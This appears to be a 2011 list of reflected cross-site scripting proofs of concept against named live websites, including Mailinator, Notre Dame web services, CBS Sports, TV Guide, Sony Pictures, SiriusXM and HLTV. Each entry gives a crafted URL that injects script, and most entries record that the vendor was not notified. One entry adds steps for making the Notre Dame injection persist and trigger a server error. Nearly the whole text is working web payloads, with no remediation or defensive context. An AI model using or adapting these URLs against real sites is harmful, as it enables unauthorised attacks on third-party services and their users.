29
Dec 11Mailinator.com
Date: Dec-29-2011
Vendor Notified: No
Proof of Concept:
http://www.mailinator.com/maildir.jsp?email=--></script><script>alert('0');</script>
Date: Dec-29-2011
Vendor Notified: No
Proof of Concept:
http://www.mailinator.com/maildir.jsp?email=--></script><script>alert('0');</script>
Date: Sept-25-2011
Vendor Notified: No
Proof of Concept:
https://apps.nd.edu/webdirectory/directory.cfm?cn=<script>alert('0');</script>
Date: Sept-25-2011
Vendor Notified: No
Proof of Concept:
https://webfile.nd.edu/~</script><script>alert('0');</script>/apps/webfile
Note:
After hitting the URL, go back to the webfile login (https://webfile.nd.edu) and use any dummy login credentials. Previous XSS will be present and spark an internal server error.
Date: Aug-20-2011
Vendor Notified: No
Proof of Concept:
http://www.cbssports.com/info/search#q=//";//\";//--></script>">'><script>alert(0)</script>
Date: Aug-20-2011
Vendor Notified: No
Proof of Concept:
http://www.addictinggames.com/static/php/game/searchPage.php?pageAction=search&text=%3C/script%3E%3Cscript%3Ealert%280%29;%3C/script%3E
Date: Aug-18-2011
Vendor Notified: No
Proof of Concept:
http://www.tvguide.com/search/index.aspx?keyword=%22%3E%3Cscript%3Ealert%28%270%27%29;%3C/script%3E
Date: Aug-18-2011
Vendor Notified: No
Proof of Concept:
http://search.sonypictures.com/search?q=%22;alert%280%29//&proxystylesheet=sp-us&site=sp-us
Date: Jul-26-2011
Vendor Notified: Yes
Proof of Concept:
http://web.sa.mapquest.com/wendys/advantage.adp?template=en_search_error&postalCode=\%27;alert(0)//
Date: Jul-24-2011
Vendor Notified: No
Proof of Concept:
http://www.siriusxm.com/servlet/Satellite?c=SXM_Channel_C&childpagename=SXM%2FSXM_Channel_C%2FChannelDetail&cid=--%3E%3Cscript%3Ealert(%270%27);%3C/script%3E&pagename=SXM%2FWrapper
Date: May-07-2011
Vendor Notified: No
Proof of Concept:
http://www.hltv.org/?pageid=198&search=1&teams=%3C/script%3E%22%3E%27%3E%3Cscript%3Ealert(String.fromCharCode(88,83,83))%3C/script%3E